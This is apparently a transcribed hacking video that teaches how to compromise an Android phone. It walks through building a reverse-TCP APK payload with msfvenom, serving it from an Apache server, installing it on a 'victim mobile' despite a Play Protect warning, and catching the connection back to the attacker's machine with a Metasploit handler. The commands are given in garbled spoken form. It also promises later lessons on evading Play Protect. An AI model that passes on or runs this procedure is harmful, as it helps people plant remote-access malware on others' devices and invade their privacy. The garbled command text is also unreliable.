Hello guys, MrCyberg here, back again with another new video. In this video, we are going to see about how to hack an Android device. So before getting into the topic, we need to understand some basic terms for that. So the basic terms which are follows are payload, Msfvenom, MSF console. So first payload. What is a payload? Payload is a virus file which helps to compromise the target Android device. So it will call as the payload. And the second thing is the Msfvenom. Msfvenom is a tool which helps to generate the payload and to compromise the target. And the third one is the MSF console. So the MSF console is the is like the control panel which has all the controls for controlling the Android device or the target. So for that, let me clear this first. Clear. So first we need to create the payload to compromise the target. So to create the payload, type in the terminal Msfvenom -p Android /interpreter /reverse TCP host. So here -p is the payload which we're going to use. We're going to compromise the Android target, so we're using Android /metapredator /reverse TCP. So lhost and then the lhost. Lhost means local host. We are performing this attack in our local network, not in the internet or a WAN network. We are trying to compromise the target which is in the local network. So for the lhost means local host. To find the lhost, let me open another terminal. Type IP addr, small IP addr. See, my IP address is 107. So 192.168.10.07. So we need to have another one parameter which is L port equal to 4444, which is the default port for it, and we might output it to the hacker.apk. So what we are doing here is we are creating a payload for the Android. So for that we are creating -p using -p parameter to generate the payload for the Android to the metapredator reverse TCP, and we need to get back the host connection to us. So we are the host, we are the server line. So we are giving the lhost here, which is our IP address, our machine IP address, and the L port. So to connect for the to connect back which port address. So and the file name we are giving here is the hacker.apk. Just type it and give enter. You see, we have created the payload and the payload size is 10185 bytes. So let me copy it to the desktop first. cp hacker.apk /desktop. So sorry, I think I have overwritten the payload file. Sorry for that. We get here. Okay, this is in the file system root. Sorry, not in the root. Home and privilege. You see here, this is the payload which I have created. So what you have to do is, you have created the payload for the Android. So now we have to send the payload to the target. So for that we are going to use Apache server. For the Apache server, service Apache 2, sorry, service Apache 2 start. Admin password. Okay, to see the status of the server, type service Apache 2 status. So it is running now. So what you have to do is copy the file cp hacker.apk to where www/html sudo the magic keyword. Okay, now we have copied the payload to the Apache server. Let's verify it whether we can access the file or not. So to verify, just type in the IP address of your local machine, which is 192.168.10.107. Sorry, the address wrong. 192. You see, the APK file is here. So let me get installed into my mobile first. Just give me a second. 192.168.10.117. Hacker APK download. Yes. Open. Install. But when you're installing in your mobile, you get a pop-up that it is getting blocked by the Play product, because it is a not signed APK. We have just created for total purpose. But in the future videos, I'll tell you how to sign an APK and to evade the Play product verification. Okay, but for this, let's keep it simple. We'll just give the install anyway option. Without giving the install anyway option, the APK won't install in your mobile. So give it install anyway. So now I have installed in my mobile. So let's move to the another process. Clear. I think you can close it. So for now, we have generated the payload and install the payload in our victim mobile. So now you have to take control of the mobile. So for that, just a simple tip: before starting MSF console, there will be some database errors or something else. So for that errors, just type before service PostgreSQL start magic word sudo. Now type msf console. This will skip the errors and open the console area. You see, now the msf console has been opened. Another small tip: if you don't like this, what to say, these designs or this is Metasploit and payload, this and all, I'll show you a quick way. Just quit it and clear. Now type msf console -q. Q denotes the quiet mode, so it don't shows that banner and all, and when it is updated, who is the author, it shows in nothing, just shows the command line. See, just a quick note. Okay, so for now, to take control of the compromised target, so first we have to set the multi-handler option. So multi-handler option, which is used to handle multiple sessions. So for that, use exploit /multi/handler. Then we have to set the payload for that. Set payload. What is the payload for that? Android /interpreter /reverse TCP. This is the payload. If you have any errors here typing here, it will show you here which is not set in, so you can verify here by checking here. Now you have to set the L port. Set L host first. It doesn't matter, L host, L port first. L host to next.168.10.107, which is my local IP address. Now for the L port we are set for the 4444. You can set any port address, but to keep it simple, I am using 4444. Now verify by giving the show options. We have set the L port. See here, L host is a required parameter, and L port is also a required parameter. So without the L host and L port, this attack won't happen. Okay, keep in mind, L host is also required, L port is also required. Without this, the attack won't happen. So after setting the L host and L port and setting the payload, you just have to type your exploit. After viewing exploit, it displays a message saying that server started reverse TCP handler. So it is waiting. What is doing now is it is waiting for the target to connect to it. So I am opening the application on mobile. As soon as I open the application, you get a reverse connection from here. Watch it. I'm opening the app now. See, I have opened and I have got the session here. And note that we are not signed the APK right now, so the app sometimes gets closed itself because it is not digitally signed. So what the Play product does is, if it doesn't recognize the author or developer, it automatically closes the application. Let me get downtime, exploit, and now open the app. Sysinfo. See now, the mobile is now accessible. So let's finish the video right now. For now, in the future videos, I'll show you how to bypass his play product and compromise the target full and take full control of the mobile. So until then, take care. If you have any doubts in this, you can ask me in the Instagram page of ETR Infotech. If you like this video, do like, share and subscribe, and stay tuned for the future videos. Thank you.